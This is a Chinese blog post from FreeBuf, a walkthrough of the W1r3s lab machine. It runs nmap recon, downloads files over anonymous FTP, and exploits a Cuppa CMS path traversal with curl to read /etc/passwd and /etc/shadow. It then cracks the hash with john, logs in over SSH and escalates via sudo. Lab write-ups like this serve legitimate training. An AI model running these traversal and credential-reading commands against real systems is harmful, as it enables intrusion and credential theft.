freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

W1r3s靶机渗透学习笔记
2024-02-08 09:37:56

1.信息搜集

sudo nmap -sn 192.168.80.0/24

(不使用root权限,防止靶机恶意代码对kali机器底层代码进行修改)

-sn 在主机发现后不进行端口扫描,只打印可用主机,允许对目标网络进行轻量级侦察不被发现

-sL 列表扫描

端口探测

sudo nmap -sT --min-rate 10000 -p- 192.168.80.137 -oA /home/kali/nmapscan/ports 

扫描技术

-sS 利用tcp的syn标志位对端口进行探测,发送syn包只建立tcp链接的第一步,获得反馈之后进行下一步

因为只发送了协议的一部分,所以会被防火墙过滤

-sT 利用三次握手过程来进行端口探测,发送完整的tcp连接请求来进行探测,更准确,也不会被防火墙过滤

--min-rate 最慢扫描每秒多少次,红队中不能太多,会被发现

-p- 1-65535端口进行扫描

-oA 用三种格式记录扫描结果

1707355747_65c42e63699f021fd8515.png!small?1707355748776

查看扫描结果

ls -liah /home/kali/nmapscan

1707355755_65c42e6b2b1376373d1f4.png!small?1707355755263

1707355764_65c42e7437c307c2aa0f2.png!small?1707355765202

单独输出端口

grep open /home/kali/nmapscan/ports.nmap 

1707355772_65c42e7c709cf6bff1812.png!small?1707355772587

单独打印

grep open /home/kali/nmapscan/ports.nmap | awk -F'/' '{print $1}'  

1707355785_65c42e89399ee50711ca0.png!small?1707355785348

grep open /home/kali/nmapscan/ports.nmap | awk -F'/' '{print $1}' |paste -sd ','

1707355793_65c42e918579744c76449.png!small?1707355793760

-F 在指定哪一行

-sd 指定用什么分隔符

变量指定数据

ports=$(grep open /home/kali/nmapscan/ports.nmap | awk -F'/' '{print $1}' |paste -sd ',')

1707355807_65c42e9f98674edf8d982.png!small?1707355807685

详细信息扫描

sudo nmap -sT -sV -sC -O -p21,22,80,3306 192.168.80.137 -oA /home/kali/nmapscan/detail

-sV 探测各服务版本

-sC 使用默认脚本进行扫描

-O 扫描操作系统版本

-p 确定扫描端口

1707355819_65c42eabc4568f99a13d6.png!small?1707355820695

UDP扫描

sudo nmap -sU --top-ports 20 192.168.80.137 -oA /home/kali/nmapscan/udp

-sU 指定进行udp扫描

--top-prots 对常用的20个端口进行扫描

1707355830_65c42eb634458ad76ec66.png!small?1707355830516

扫描结果,top20的端口都是悬疑状态

默认脚本扫描

sudo nmap --script=vuln -p21,22,80,3306 192.168.80.137 -oA /home/kali/nmapscan/vuln

--scrip=vuln nmap的漏洞脚本目录

1707355842_65c42ec21c7324d42d108.png!small?1707355842851

信息总结

端口扫描

1707355850_65c42ecae3db1a62bc0c9.png!small?1707355851389

21 ftp 中可能存在信息泄露,或者应用程序漏洞

22 ssh不先考虑 可能用到爆破

80 最可能解决的

3306 数据库默认端口,可以尝试用弱密码登录

漏洞扫描

1707355858_65c42ed2b57f46aee63be.png!small?1707355859054

漏洞扫描的结果

1707355867_65c42edba710d2502fd11.png!small?1707355868462

21,22都没什么特别有用的信息

80 dos 攻击基本不会选,没有技术含量

没有找到xss漏洞

3306 没有什么漏洞

如果什么都没有看看ipv6

完成nmp四大扫描

2.漏洞寻找

21端口,ftp匿名登陆

匿名登陆 用户名为anonymous 密码为空

1707355879_65c42ee7b76bf010ae9ff.png!small?1707355879983

进到ftp中使用二进制模式,否则可执行命令会出错

prompt 关闭交互式命令免得下载文件需要重复执行yes

1707355886_65c42eeee65056e10cc01.png!small?1707355887487

mget  下载命令

切换回上级目录

1707355899_65c42efb35927a5c4e4ea.png!small?1707355899367

进入docs 目录查看信息,mget下载worktodo.txt文件

1707355913_65c42f093ec6c6e7171df.png!small?1707355913354

切换回上一级目录,下载最后一个目录的文件

FTP渗透

1707356041_65c42f8946984a9025d73.png!small?1707356041378

查看下载下来的五个文件

1707356056_65c42f9874bde2abb0588.png!small?1707356056654

cat *  读取多个文件
如果不知道被加密信息用的是哪种加密算法,可以使用工具hash-identifier

1707356067_65c42fa3b7680db406980.png!small?1707356067879

md5加密

1707356077_65c42faddc36fb8fccd59.png!small?1707356078391

编辑文件把密码塞入,用john进行解密

浏览器破解

到最后也没啥有用信息

查看80端口信息

1707356087_65c42fb7f3e216ef89543.png!small?1707356088793

没有什么有用信息

尝试对目录进行爆破,获取更多信息

1707356098_65c42fc247f3e60d71098.png!small?1707356098442

1707356112_65c42fd0755bb9c6e4825.png!small?1707356112509

尝试登陆

1707356123_65c42fdbaf68b6e8d256b.png!small?1707356123958没有发现什么可以进行反弹shell的机会

查看服务,框架之类的有没有漏洞

1707356133_65c42fe5079bc05e75a06.png!small?1707356133277

下载漏洞

1707356140_65c42fec4db160dc5c28c.png!small?1707356140875

1707356149_65c42ff5dd9425a730caf.png!small?1707356150127

按照漏洞使用说明进行利用

http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

1707356159_65c42fff6ae56b0b0e45a.png!small?1707356159546

漏洞分析 是因为没有对post请求进行任何处理造成的(倒数第三行)

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.80.137/administrator/alerts/alertConfigField.php

1707356168_65c43008c83d37b4129f6.png!small?1707356169093

使用post的方式进行传输

1707356176_65c43010283ed0f62fda5.png!small?1707356176182

1707356187_65c4301b1acbc4888166e.png!small?1707356188313

在现在linux系统中,passwd文件里面所有账户的密码都是用x代替的,真正的密码(加密后)放在/etc/shadow中,同样的curl方法,我们改一下参数,看看etc/shadow

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.80.137/administrator/alerts/alertConfigField.php

1707356199_65c4302745a25007f1edb.png!small?1707356199454

将加密账号密码写入记事本,使用john进行密码破解

1707356209_65c43031431fc39706d3c.png!small?1707356209458

解密结果 账号w1r3s 密码computer

ssh远程登录

ssh w1r3s@192.168.80.137

1707356220_65c4303c9a9b052b01e22.png!small?1707356221480

shoami
uname -a
id
sudo -l 查看当前用户都有什么权限

1707356232_65c430483808f1fe73f6a.png!small?1707356232691

可以看到所有权限都是ALL

w1r3 拥有所有权限

所以可以使用sudo su直接进行提权

或者

sudo /bin/bash  启动bash会话

1707356242_65c43052ee764abb25df3.png!small?1707356243119

flag通常在root目录下面

cd进入root目录

cat flag.txt

# 网络安全 # web安全 # 系统安全 # 内网渗透 # 网络安全技术
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录